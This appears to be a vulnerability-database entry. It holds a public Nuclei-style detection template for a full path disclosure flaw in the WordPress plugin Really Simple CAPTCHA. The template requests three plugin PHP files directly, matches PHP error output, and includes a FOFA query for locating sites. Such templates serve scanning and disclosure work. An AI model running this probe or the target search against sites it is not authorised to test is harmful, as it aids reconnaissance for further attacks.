漏洞描述
WordPress Plugin Really Simple CAPTCHA was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
wp-really-simple-captcha-fpd: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure
PoC代码[已公开]
id: wp-really-simple-captcha-fpd
info:
name: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure
author: pussycat0x
severity: low
description: |
WordPress Plugin Really Simple CAPTCHA was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
max-request: 3
verified: false
fofa-query: body="wp-content/plugins/really-simple-captcha/"
tags: wordpress,wp,wp-plugin,fpd,wp-really-simple-captcha
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/really-simple-captcha/really-simple-captcha.php"
- "{{BaseURL}}/wp-content/plugins/really-simple-captcha/includes/filesystem.php"
- "{{BaseURL}}/wp-content/plugins/really-simple-captcha/uninstall.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
- 'status_code == 200 || status_code == 500'
- 'contains(body, "really-simple-captcha")'
condition: and
# digest: 490a00463044022051deb3c4a07605564c86c1cfba242f837ede5c2b2ee116e21eed8873cde6c1e90220317540abac964c493e161b23347f25ae44deef593152e1fe5e76f8affe0469cf:922c64590222798bb761d5b6d8e72950